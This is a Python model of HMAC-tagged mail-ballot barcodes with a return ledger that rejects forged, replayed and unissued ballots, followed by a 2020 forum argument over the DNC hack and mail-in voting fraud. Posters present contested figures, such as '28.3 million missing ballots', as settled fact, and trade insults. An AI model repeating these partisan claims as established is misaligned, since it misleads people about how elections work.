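# Assumed: the election office holds a per-election secret used to tag barcodes.
DEMO_KEY = b"election-office-demo-key"  # constructed for this example only


def issue_barcode(voter_id: str, election_id: str, key: bytes = DEMO_KEY) -> str:
    """Barcode = election:voter:tag, where tag = truncated HMAC-SHA256 over election:voter."""
    msg = f"{election_id}:{voter_id}".encode()
    tag = hmac.new(key, msg, hashlib.sha256).hexdigest()[:16]
    return f"{election_id}:{voter_id}:{tag}"


class ReturnLedger:
    """Tracks which barcodes were issued and which have been scanned back in."""

    def __init__(self, election_id: str, key: bytes = DEMO_KEY):
        self.election_id = election_id
        self.key = key
        self.issued = {}    # voter_id -> barcode mailed out
        self.returned = {}  # voter_id -> (barcode, drop_site) for the first valid scan

    def issue(self, voter_id: str) -> str:
        barcode = issue_barcode(voter_id, self.election_id, self.key)
        self.issued[voter_id] = barcode
        return barcode

    def scan(self, barcode: str, drop_site: str) -> str:
        """Validate a returned barcode; only the first valid scan per voter is accepted."""
        parts = barcode.split(":")
        if len(parts) != 3:
            return "REJECT_MALFORMED"
        election_id, voter_id, tag = parts
        if election_id != self.election_id:
            return "REJECT_WRONG_ELECTION"
        # Recompute the tag; constant-time compare so a forged tag is not leaked byte by byte.
        expected = issue_barcode(voter_id, election_id, self.key).split(":")[2]
        if not hmac.compare_digest(tag, expected):
            return "REJECT_BAD_TAG"
        # A correctly tagged barcode still has to match one this office actually mailed.
        if voter_id not in self.issued or self.issued[voter_id] != barcode:
            return "REJECT_NOT_ISSUED"
        # One ballot per voter: a second scan, same or different drop site, is refused.
        if voter_id in self.returned:
            return "REJECT_DUPLICATE"
        self.returned[voter_id] = (barcode, drop_site)
        return "ACCEPTED"

    def unaccounted(self) -> list:
        """Voters whose ballot was mailed but never scanned back in."""
        return sorted(set(self.issued) - set(self.returned))


def demo() -> dict:
    """Run the ledger over a constructed set of returns and report each outcome."""
    ledger = ReturnLedger("2020-GEN")
    bc1 = ledger.issue("V001")
    ledger.issue("V002")
    ledger.issue("V003")
    results = {
        "first_return": ledger.scan(bc1, "dropbox-A"),
        "replayed_return": ledger.scan(bc1, "dropbox-B"),
        "forged_tag": ledger.scan("2020-GEN:V002:0000000000000000", "dropbox-A"),
        "never_issued": ledger.scan(issue_barcode("V999", "2020-GEN"), "dropbox-A"),
        "wrong_election": ledger.scan(issue_barcode("V002", "2018-GEN"), "dropbox-A"),
        "garbage": ledger.scan("not-a-barcode", "dropbox-A"),
        "unaccounted": ledger.unaccounted(),
    }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The point the model makes concrete: the barcode does not protect the secrecy or content of the ballot, only the binding between a physical envelope and one issued record, so the checks that matter are forgery (the tag), replay (the duplicate rule) and reconciliation (the unaccounted list). Anything this toy accepts still has to pass whatever signature and eligibility checks a real office applies before the ballot is opened.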
57 minutes ago, DKW 86 said:

Actually, you are right about this.
The FBI went to the Sierra Foxtrots at the DNC and told them, some as many as 6X, that there was malware on the server. 
The DNC did ZERO. Took no action at all. Not even PW resets.
I have no sympathy for people that are warned repeatedly and still do nothing and then want to have a whine and cheese party when what they were warned about blows up in their faces. But this is true. THE DNC WAS WARNED REPEATEDLY BY THE FBI BEFORE THE HACK BECAME FRONTPAGE NEWS. THEY DID ABSOLUTELY NOTHING. ZERO. COMPLETELY IGNORED THE FBI.

When you are this pathetic and you get blown up, well, it sucks to be you. 

https://www.thedailybeast.com/cheats/2016/12/13/dnc-blew-off-fbi-hack-warnings

https://www.cnn.com/2016/07/25/politics/democratic-convention-dnc-emails-russia/index.html

https://themoscowproject.org/collusion/fbi-informs-dnc-russian-hacking/

https://thehill.com/policy/national-security/313555-comey-fbi-did-request-access-to-hacked-dnc-servers

*** Going back to 2015, The FBI was telling the DNC they were being hacked. And they did nothing.

 

It was a big failure on both sides. The FBI shouldn't have been so low key about it, and should have been contacting the higher ups of the DNC (and when they found out, Crowdstrike was brought in) and the low level tech support dweeb shouldn't have been so flippant in his contact with the FBI regarding an issue above his pay grade. Said dweeb's testimony is what I linked above, by the way.

I wish I could say such occurrences are rare outside of this, but having worked in support, I know better. You've probably experienced it too. 

2 hours ago, Brad_ATX said:

There's really not though.  Each ballot gets mailed with a bar code coinciding with the voter's information.  Once that bar code is scanned into the system after being dropped off at a secure location, you're good.  Hard to fraudulently vote that way.

The state of Washington already uses a similar system as the one described.  No concerns or evidence of widespread voter fraud at all so far up there.  Opinion article, but the pertinent info is this:

"Washington's Republican Secretary of State released figures Monday on the 2018 election. Just 142 cases of improper voting out of 3.1 million ballots were referred to county sheriffs and prosecutors for legal action.

That's 0.004% of what was an energized electorate"

https://www.seattlepi.com/local/politics/article/wash-vote-by-mail-2018-improper-voting-released-15245906.php

I guess it depends on where you get your information:

Between 2012 and 2018, 28.3 million mail-in ballots remain unaccounted for, according to data from the federal Election Assistance Commission. The missing ballots amount to nearly one in five of all absentee ballots and ballots mailed to voters residing in states that do elections exclusively by mail.

States and local authorities simply have no idea what happened to these ballots since they were mailed – and the figure of 28 million missing ballots is likely even higher because some areas in the country, notably Chicago, did not respond to the federal agency’s survey questions. This figure does not include ballots that were spoiled, undeliverable, or came back for any reason.

A significant increase in mail-in voting this fall could greatly incentivize “ballot harvesting,” where third parties collect mail-in ballots on behalf of voters and deliver them to election officials. There’s long been a consensus that such a practice incentivizes fraud, and ballot harvesting is illegal in most of the country. Public debate over the issue has intensified in recent years after a GOP operative in North Carolina was indicted for crimes related to ballot harvesting in 2018.

https://www.realclearpolitics.com/articles/2020/04/24/28_million_mail-in_ballots_went_missing_in_last_four_elections_143033.html

To force states that do not have an established procedure to come up with a mail-in system for the sheer number of ballots it would entail just won't work the way it does in Washington.  JMO

4 hours ago, DKW 86 said:

An indictment is not a compelling piece of evidence. It is a request for charges to be brought. It is COMPLETELY unchallenged.

No, it is a formal charging document, not a request. It was true billed by a grand jury. 

Quote

No rules of evidence apply, none.
No rules of testifying. You can't even use some testimony used to get an indictment in the trial.
No challenging any one about anything. 
No presence of the Defense there whatsoever. 
No Cross-examination.  

That's what the trial is for. 

But, once again, you thick skulled ninny, I'm weighing the evidence contained therein independent of the fact that it is an indictment. I'm not treating it like an indictment. That's you. Treat it like a report on findings of fact. The evidence you asked me to link is contained there.

4 hours ago, DKW 86 said:

COMPLETELY WRONG. Often, half or more of a case is built AFTER the Indictment. 
Do you realize that some, or possibly even most, evidence used in an indictment might not be usable in a court of law?

Unsealing GJ Testimony is illegal. The witnesses get a lawyer, the defendant gets a lawyer, everything changes. An indictment might not mean anything.

Of course, but again, immaterial. Read the ******* thing. Weigh the evidence for yourself. Stop dismissing it hamhandedly. 

Edited by AUDub

1 hour ago, I_M4_AU said:

I guess it depends on where you get your information:

Between 2012 and 2018, 28.3 million mail-in ballots remain unaccounted for, according to data from the federal Election Assistance Commission. The missing ballots amount to nearly one in five of all absentee ballots and ballots mailed to voters residing in states that do elections exclusively by mail.

States and local authorities simply have no idea what happened to these ballots since they were mailed – and the figure of 28 million missing ballots is likely even higher because some areas in the country, notably Chicago, did not respond to the federal agency’s survey questions. This figure does not include ballots that were spoiled, undeliverable, or came back for any reason.

A significant increase in mail-in voting this fall could greatly incentivize “ballot harvesting,” where third parties collect mail-in ballots on behalf of voters and deliver them to election officials. There’s long been a consensus that such a practice incentivizes fraud, and ballot harvesting is illegal in most of the country. Public debate over the issue has intensified in recent years after a GOP operative in North Carolina was indicted for crimes related to ballot harvesting in 2018.

https://www.realclearpolitics.com/articles/2020/04/24/28_million_mail-in_ballots_went_missing_in_last_four_elections_143033.html

To force states that do not have an established procedure to come up with a mail-in system for the sheer number of ballots it would entail just won't work the way it does in Washington.  JMO

So what Washington does is have dedicated, drive thru drop off locations.  The voter is the one that drives up to the box, drops their sealed vote in, and moves on.  An election volunteer is there to confirm that everything runs smoothly.  Then the ballots are taken directly from that box to the vote counting facility.  Eliminates the possibility of votes being unaccounted for as they are under the control of the voter and then the state the entire time.
